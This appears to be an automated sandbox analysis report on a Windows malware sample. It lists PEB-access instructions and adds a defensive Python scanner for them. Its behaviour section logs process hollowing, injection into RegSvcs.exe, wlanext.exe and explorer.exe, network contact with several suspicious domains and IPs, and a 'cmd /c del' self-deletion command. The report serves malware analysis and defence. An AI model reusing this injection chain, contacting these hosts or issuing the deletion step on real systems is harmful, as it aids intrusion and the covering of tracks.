Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106FDE2 mov eax, dword ptr fs:[00000030h] 3_2_0106FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106FDE2 mov eax, dword ptr fs:[00000030h] 3_2_0106FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01058DF1 mov eax, dword ptr fs:[00000030h] 3_2_01058DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h] 3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h] 3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h] 3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h] 3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h] 3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h] 3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h] 3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h] 3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h] 3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h] 3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h] 3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h] 3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h] 3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h] 3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01026C0A mov eax, dword ptr fs:[00000030h] 3_2_01026C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01026C0A mov eax, dword ptr fs:[00000030h] 3_2_01026C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01026C0A mov eax, dword ptr fs:[00000030h] 3_2_01026C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01026C0A mov eax, dword ptr fs:[00000030h] 3_2_01026C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0107740D mov eax, dword ptr fs:[00000030h] 3_2_0107740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0107740D mov eax, dword ptr fs:[00000030h] 3_2_0107740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0107740D mov eax, dword ptr fs:[00000030h] 3_2_0107740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FBD5E0 mov eax, dword ptr fs:[00000030h] 3_2_00FBD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FBD5E0 mov eax, dword ptr fs:[00000030h] 3_2_00FBD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD1DB5 mov eax, dword ptr fs:[00000030h] 3_2_00FD1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD1DB5 mov eax, dword ptr fs:[00000030h] 3_2_00FD1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD1DB5 mov eax, dword ptr fs:[00000030h] 3_2_00FD1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0103C450 mov eax, dword ptr fs:[00000030h] 3_2_0103C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0103C450 mov eax, dword ptr fs:[00000030h] 3_2_0103C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD35A1 mov eax, dword ptr fs:[00000030h] 3_2_00FD35A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDFD9B mov eax, dword ptr fs:[00000030h] 3_2_00FDFD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDFD9B mov eax, dword ptr fs:[00000030h] 3_2_00FDFD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA2D8A mov eax, dword ptr fs:[00000030h] 3_2_00FA2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA2D8A mov eax, dword ptr fs:[00000030h] 3_2_00FA2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA2D8A mov eax, dword ptr fs:[00000030h] 3_2_00FA2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA2D8A mov eax, dword ptr fs:[00000030h] 3_2_00FA2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA2D8A mov eax, dword ptr fs:[00000030h] 3_2_00FA2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD2581 mov eax, dword ptr fs:[00000030h] 3_2_00FD2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD2581 mov eax, dword ptr fs:[00000030h] 3_2_00FD2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD2581 mov eax, dword ptr fs:[00000030h] 3_2_00FD2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD2581 mov eax, dword ptr fs:[00000030h] 3_2_00FD2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FCC577 mov eax, dword ptr fs:[00000030h] 3_2_00FCC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FCC577 mov eax, dword ptr fs:[00000030h] 3_2_00FCC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FC7D50 mov eax, dword ptr fs:[00000030h] 3_2_00FC7D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE3D43 mov eax, dword ptr fs:[00000030h] 3_2_00FE3D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD4D3B mov eax, dword ptr fs:[00000030h] 3_2_00FD4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD4D3B mov eax, dword ptr fs:[00000030h] 3_2_00FD4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD4D3B mov eax, dword ptr fs:[00000030h] 3_2_00FD4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAAD30 mov eax, dword ptr fs:[00000030h] 3_2_00FAAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h] 3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h] 3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h] 3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h] 3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h] 3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h] 3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h] 3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h] 3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h] 3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h] 3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h] 3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h] 3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h] 3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01078CD6 mov eax, dword ptr fs:[00000030h] 3_2_01078CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01026CF0 mov eax, dword ptr fs:[00000030h] 3_2_01026CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01026CF0 mov eax, dword ptr fs:[00000030h] 3_2_01026CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01026CF0 mov eax, dword ptr fs:[00000030h] 3_2_01026CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010614FB mov eax, dword ptr fs:[00000030h] 3_2_010614FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0107070D mov eax, dword ptr fs:[00000030h] 3_2_0107070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0107070D mov eax, dword ptr fs:[00000030h] 3_2_0107070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0103FF10 mov eax, dword ptr fs:[00000030h] 3_2_0103FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0103FF10 mov eax, dword ptr fs:[00000030h] 3_2_0103FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB76E2 mov eax, dword ptr fs:[00000030h] 3_2_00FB76E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD16E0 mov ecx, dword ptr fs:[00000030h] 3_2_00FD16E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD36CC mov eax, dword ptr fs:[00000030h] 3_2_00FD36CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE8EC7 mov eax, dword ptr fs:[00000030h] 3_2_00FE8EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01078F6A mov eax, dword ptr fs:[00000030h] 3_2_01078F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FCAE73 mov eax, dword ptr fs:[00000030h] 3_2_00FCAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FCAE73 mov eax, dword ptr fs:[00000030h] 3_2_00FCAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FCAE73 mov eax, dword ptr fs:[00000030h] 3_2_00FCAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FCAE73 mov eax, dword ptr fs:[00000030h] 3_2_00FCAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FCAE73 mov eax, dword ptr fs:[00000030h] 3_2_00FCAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB766D mov eax, dword ptr fs:[00000030h] 3_2_00FB766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01027794 mov eax, dword ptr fs:[00000030h] 3_2_01027794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01027794 mov eax, dword ptr fs:[00000030h] 3_2_01027794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01027794 mov eax, dword ptr fs:[00000030h] 3_2_01027794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB7E41 mov eax, dword ptr fs:[00000030h] 3_2_00FB7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB7E41 mov eax, dword ptr fs:[00000030h] 3_2_00FB7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB7E41 mov eax, dword ptr fs:[00000030h] 3_2_00FB7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB7E41 mov eax, dword ptr fs:[00000030h] 3_2_00FB7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB7E41 mov eax, dword ptr fs:[00000030h] 3_2_00FB7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB7E41 mov eax, dword ptr fs:[00000030h] 3_2_00FB7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAE620 mov eax, dword ptr fs:[00000030h] 3_2_00FAE620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDA61C mov eax, dword ptr fs:[00000030h] 3_2_00FDA61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDA61C mov eax, dword ptr fs:[00000030h] 3_2_00FDA61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAC600 mov eax, dword ptr fs:[00000030h] 3_2_00FAC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAC600 mov eax, dword ptr fs:[00000030h] 3_2_00FAC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAC600 mov eax, dword ptr fs:[00000030h] 3_2_00FAC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD8E00 mov eax, dword ptr fs:[00000030h] 3_2_00FD8E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE37F5 mov eax, dword ptr fs:[00000030h] 3_2_00FE37F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061608 mov eax, dword ptr fs:[00000030h] 3_2_01061608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0105FE3F mov eax, dword ptr fs:[00000030h] 3_2_0105FE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106AE44 mov eax, dword ptr fs:[00000030h] 3_2_0106AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106AE44 mov eax, dword ptr fs:[00000030h] 3_2_0106AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB8794 mov eax, dword ptr fs:[00000030h] 3_2_00FB8794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0103FE87 mov eax, dword ptr fs:[00000030h] 3_2_0103FE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FBFF60 mov eax, dword ptr fs:[00000030h] 3_2_00FBFF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01070EA5 mov eax, dword ptr fs:[00000030h] 3_2_01070EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01070EA5 mov eax, dword ptr fs:[00000030h] 3_2_01070EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01070EA5 mov eax, dword ptr fs:[00000030h] 3_2_01070EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010246A7 mov eax, dword ptr fs:[00000030h] 3_2_010246A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FBEF40 mov eax, dword ptr fs:[00000030h] 3_2_00FBEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0105FEC0 mov eax, dword ptr fs:[00000030h] 3_2_0105FEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDE730 mov eax, dword ptr fs:[00000030h] 3_2_00FDE730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01078ED6 mov eax, dword ptr fs:[00000030h] 3_2_01078ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA4F2E mov eax, dword ptr fs:[00000030h] 3_2_00FA4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA4F2E mov eax, dword ptr fs:[00000030h] 3_2_00FA4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FCF716 mov eax, dword ptr fs:[00000030h] 3_2_00FCF716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDA70E mov eax, dword ptr fs:[00000030h] 3_2_00FDA70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDA70E mov eax, dword ptr fs:[00000030h] 3_2_00FDA70E
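
Every entry above is a `mov eax, dword ptr fs:[00000030h]` (one of them uses ecx): the 32-bit idiom for loading the PEB pointer out of the TEB, normally the first step of checks such as PEB.BeingDebugged or a walk of the loaded-module list. The scanner below is an added example written for this report, not Joe Sandbox code; it locates the hand-assembled encodings of that idiom in a raw code buffer, including the x64 gs:[60h] form, and the SAMPLE buffer is constructed here rather than taken from the analysed binary.

```python
"""
Static scan for the PEB-access idiom flagged above.

Added example written for this report; it is not Joe Sandbox code and the
byte buffer below is constructed by hand, not taken from the sample.
"""

REGS32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
REGS64 = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]  # REX.R ignored

# In a 32-bit process FS points at the TEB: TEB+0x30 is the PEB pointer and
# TEB+0x18 is the TEB self-pointer (used by the two-step mov eax,fs:[18h] /
# mov eax,[eax+30h] variant). 64-bit code uses GS, with the PEB at TEB+0x60.
PEB_X86, TEB_SELF_X86, PEB_X64 = 0x30, 0x18, 0x60


def scan_peb_reads(code: bytes):
    """Return [(offset, mnemonic, kind)] for every direct TEB/PEB read.

    kind is "peb_x86", "teb_x86" or "peb_x64". The scanner matches byte
    patterns at every offset without disassembling, so it can fire inside an
    unrelated instruction or miss reads done via another addressing form; it
    is a triage aid, not a replacement for a disassembler.
    """
    hits = []
    n = len(code)
    i = 0
    while i < n:
        b = code[i]
        # 64 A1 disp32            mov eax, dword ptr fs:[disp32] (moffs form)
        if b == 0x64 and i + 6 <= n and code[i + 1] == 0xA1:
            disp = int.from_bytes(code[i + 2:i + 6], "little")
            if disp in (PEB_X86, TEB_SELF_X86):
                kind = "peb_x86" if disp == PEB_X86 else "teb_x86"
                hits.append((i, f"mov eax, dword ptr fs:[{disp:#x}]", kind))
                i += 6
                continue
        # 64 8B /r disp32         mov r32, dword ptr fs:[disp32]
        # ModRM mod=00 rm=101 (low bits 0x05) is a bare disp32 operand;
        # bits 3-5 of the ModRM byte name the destination register.
        if b == 0x64 and i + 7 <= n and code[i + 1] == 0x8B and (code[i + 2] & 0xC7) == 0x05:
            disp = int.from_bytes(code[i + 3:i + 7], "little")
            if disp in (PEB_X86, TEB_SELF_X86):
                reg = REGS32[(code[i + 2] >> 3) & 7]
                kind = "peb_x86" if disp == PEB_X86 else "teb_x86"
                hits.append((i, f"mov {reg}, dword ptr fs:[{disp:#x}]", kind))
                i += 7
                continue
        # 65 48 8B /r 25 disp32   mov r64, qword ptr gs:[disp32] (SIB, no base)
        if (b == 0x65 and i + 9 <= n and code[i + 1] == 0x48 and code[i + 2] == 0x8B
                and (code[i + 3] & 0xC7) == 0x04 and code[i + 4] == 0x25):
            disp = int.from_bytes(code[i + 5:i + 9], "little")
            if disp == PEB_X64:
                reg = REGS64[(code[i + 3] >> 3) & 7]
                hits.append((i, f"mov {reg}, qword ptr gs:[{disp:#x}]", "peb_x64"))
                i += 9
                continue
        i += 1
    return hits


def summarize(code: bytes) -> dict:
    """Count hits per kind; an empty dict means no direct PEB/TEB access found."""
    counts = {}
    for _, _, kind in scan_peb_reads(code):
        counts[kind] = counts.get(kind, 0) + 1
    return counts


# Constructed stand-in for a function like 3_2_00FD2581 above: a
# BeingDebugged check (PEB+2) followed by the other access forms the scanner
# knows. The x64 form is mixed in only to exercise that pattern.
SAMPLE = bytes.fromhex(
    "55 8B EC"                     # push ebp; mov ebp, esp
    "64 A1 30 00 00 00"            # mov eax, dword ptr fs:[30h]    -> PEB
    "0F B6 40 02"                  # movzx eax, byte ptr [eax+2]    PEB.BeingDebugged
    "64 8B 0D 30 00 00 00"         # mov ecx, dword ptr fs:[30h]    -> PEB
    "64 A1 18 00 00 00"            # mov eax, dword ptr fs:[18h]    -> TEB self-pointer
    "8B 40 30"                     # mov eax, dword ptr [eax+30h]   -> PEB via TEB
    "65 48 8B 04 25 60 00 00 00"   # mov rax, qword ptr gs:[60h]    -> PEB (x64 form)
    "5D C3"                        # pop ebp; ret
)

if __name__ == "__main__":
    for off, insn, kind in scan_peb_reads(SAMPLE):
        print(f"{off:#06x}  {insn:<32} {kind}")
    print(summarize(SAMPLE))
```

Run against a dumped .text section (for example the 3.2.RegSvcs.exe.400000.0.unpack artefact listed further down) the hit count gives a quick feel for how much of the code is environment-aware before any dynamic run; a handful of hits is normal in compiler runtime code, dozens in a small unpacked payload is the anti-analysis signal the report is reporting.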
Enables debug privileges
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.217 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.maraitime.com
Source: C:\Windows\explorer.exe Network Connect: 199.192.23.253 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 173.236.152.151 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.ihdeuruim.com
Source: C:\Windows\explorer.exe Domain query: www.embraceblm.com
Source: C:\Windows\explorer.exe Domain query: www.ytksw.com
Source: C:\Windows\explorer.exe Network Connect: 172.217.168.83 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.soccer-yokouchi.club
Source: C:\Windows\explorer.exe Domain query: www.helenafinaltouch.com
Source: C:\Windows\explorer.exe Network Connect: 45.39.20.158 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.contorig2.com
Source: C:\Windows\explorer.exe Network Connect: 160.153.132.205 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.bogolacke.com
Source: C:\Windows\explorer.exe Domain query: www.albanyhumanesociety.net
Source: C:\Windows\explorer.exe Domain query: www.muldentaxi.com
Source: C:\Windows\explorer.exe Domain query: www.gofourd.com
Source: C:\Windows\explorer.exe Domain query: www.buraktradingltd.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 64.190.62.111 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.sandybottomsflipflops.com
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\00098765123POIIU.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\00098765123POIIU.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread register set: target process: 3440 Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Thread register set: target process: 3440 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 380000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\00098765123POIIU.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 642008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' Jump to behavior
